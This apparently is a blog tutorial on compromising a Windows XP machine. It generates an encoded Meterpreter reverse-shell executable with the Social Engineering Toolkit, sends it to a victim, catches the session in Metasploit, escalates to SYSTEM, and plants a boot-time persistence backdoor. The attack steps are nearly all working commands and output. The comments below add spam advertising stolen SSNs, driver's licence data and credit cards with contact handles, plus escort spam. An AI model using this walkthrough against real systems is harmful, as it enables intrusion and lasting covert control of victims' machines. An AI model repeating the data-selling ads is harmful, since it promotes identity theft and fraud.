We have the following scenario:
Victim (Windows XP Machine) IP Address: 192.168.1.2
Attacker (Kali Linux Machine) IP Address: 192.168.1.3
We will use Social Engineering Toolkit in Kali Linux to generate a malicious executable payload that, when made to run at the Windows XP machine,will get the attacker complete access of the victim's machine. Then the attacker will use Metasploit to install a permanent backdoor on the victim machine.
We will perform the following steps:
1) Create malicious payload
2) Give the payload to the Victim.
3) Create listener (for the payload) on the Attacker on port 443.
4) When the user executes the payload, the Victim connects to the Attacker on port 443.
5) Escalate privilege to Windows user SYSTEM.
6) Install backdoor on the Victim.
7) Create listener (for the backdoor) on the Attacker on port 80.
8) Whenever the Victim boots, it automatically connects to the Attacker.
Perform the following steps on the Attacker (Kali Linux) Machine:
1) Create malicious executable payload.
1.1) Start Social Engineering Toolkit.
root@kali:~# setoolkit
1.2) Select option 1) Social Engineering Attacks
set> 1
1.3) Select option 4) Create a Payload and Listener
set> 4
set:payloads> Enter the IP address for the payload (reverse):192.168.1.3
What payload do you want to generate:
Name: Description:
1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Bind Shell Execute payload and create an accepting port on remote system
set:payloads>2
Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.
1) shikata_ga_nai
2) No Encoding
3) Multi-Encoder
4) Backdoored Executable
set:encoding>1
set:payloads> PORT of the listener [443]:
[-] Encoding the payload 4 times. [-]
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=4)
[*] Your payload is now in the root directory of SET as payload.exe
[-] The payload can be found in the SET home directory.
set> Start the listener now? [yes|no]: no
2) We need to send this payload file /usr/share/set/payload.exe to the Victim using social media, e-mail, uploading at a server, or any other type of choice.
3) Set up a handler on the Attacker machine using Metasploit.
3.1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.
root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
3.2) Start metasploit console.
root@kali:~# msfconsole
msf >
3.3) Select exploit.
msf > use exploit/multi/handler
3.4) Select payload.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
3.5) View options
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
3.6) Set options
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 443
LPORT => 443
3.7) Execute exploit
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.3:443
[*] Starting the payload handler...
4) As soon as the victim runs the executable file, the payload will make a connection to the attacker system, giving the attacker complete control of the victim machine.
[*] Sending stage (769536 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.3:443 -> 192.168.1.2:1038) at 2015-06-25 06:52:57 +0530
meterpreter > sysinfo
Computer : WINSETU
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >
5) Escalate privilege
meterpreter > getuid
Server username: WINSETU\shabbir
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
6) Install backdoor on the victim machine.
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter > run persistence -X -i 10 -p 80 -r 192.168.1.3
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINSETU_20150625.1651/WINSETU_20150625.1651.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=80
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
[*] Executing script C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
[+] Agent executed with PID 3648
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu
meterpreter >
7) Install handler for the backdoor on the Attacker machine listening on port 80.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.3:80
[*] Starting the payload handler...
8) Now, whenever the victim machine boots, it will automatically connect to the Attacker machine on port 80.
[*] Sending stage (769536 bytes) to 192.168.1.2[*]
Meterpreter session 2 opened (192.168.1.3:80 -> 192.168.1.2:1051) at 2015-06-25 07:19:35 +0530
meterpreter >
does the msf know the already generated payload from SET ?
ReplyDeletepayload generated by SET sent to the victim and the session is opened in msf ???
They must do the courses that are different from the other types of jobs. cursos de ti
ReplyDeleteHey Guys !
ReplyDeleteUSA Fresh & Verified SSN Leads along with Driving License/ ID Number, AVAILABLE with 99.9% connectivity
All Leads have genuine & valid information.
**DETAILS IN LEADS**
First Name | Last Name | SSN | Dob | Driving License Number | Address | City | State | Zip | Phone Number | Account Number | Payday | Bank Name | Employee Details | IP Address
*Price for SSN lead $2
*You can ask for sample before any deal
*If anyone buy in bulk, we can negotiate
*Sampling is just for serious buyers
==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
->$5 PER EACH
->Hope for the long term Business
->Interested buyers will be welcome
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.
ReplyDeletekayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - kayseri escort - gaziantep escort
ReplyDeleteHi Guy's
ReplyDeleteFresh & valid spammed USA SSN+Dob Leads with DL available in bulk.
>>1$ each SSN+DOB
>>3$ each with SSN+DOB+DL
>>5$ each for premium fullz (700+ credit score with replacement guarantee)
Prices are negotiable in bulk order
Serious buyer contact me no time wasters please
Bulk order will be preferable
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
OTHER STUFF YOU CAN GET
SSN+DOB Fullz
CC's with CVV's (vbv & non-vbv)
USA Photo ID'S (Front & back)
All type of tutorials available
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
SMTP Linux Root
DUMPS with pins track 1 and 2
WU & Bank transfers
Socks, rdp's, vpn
Php mailer
Sql injector
Bitcoin cracker
Server I.P's
HQ Emails with passwords
All types of tools & tutorials.. & much more
Looking for long term business
For trust full vendor, feel free to contact
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
Articles can be instrumental in debunking misinformation and fake news. What Dark Web By relying on thorough research and credible sources, journalists can counter false narratives and provide readers with accurate information to make informed judgments.
ReplyDelete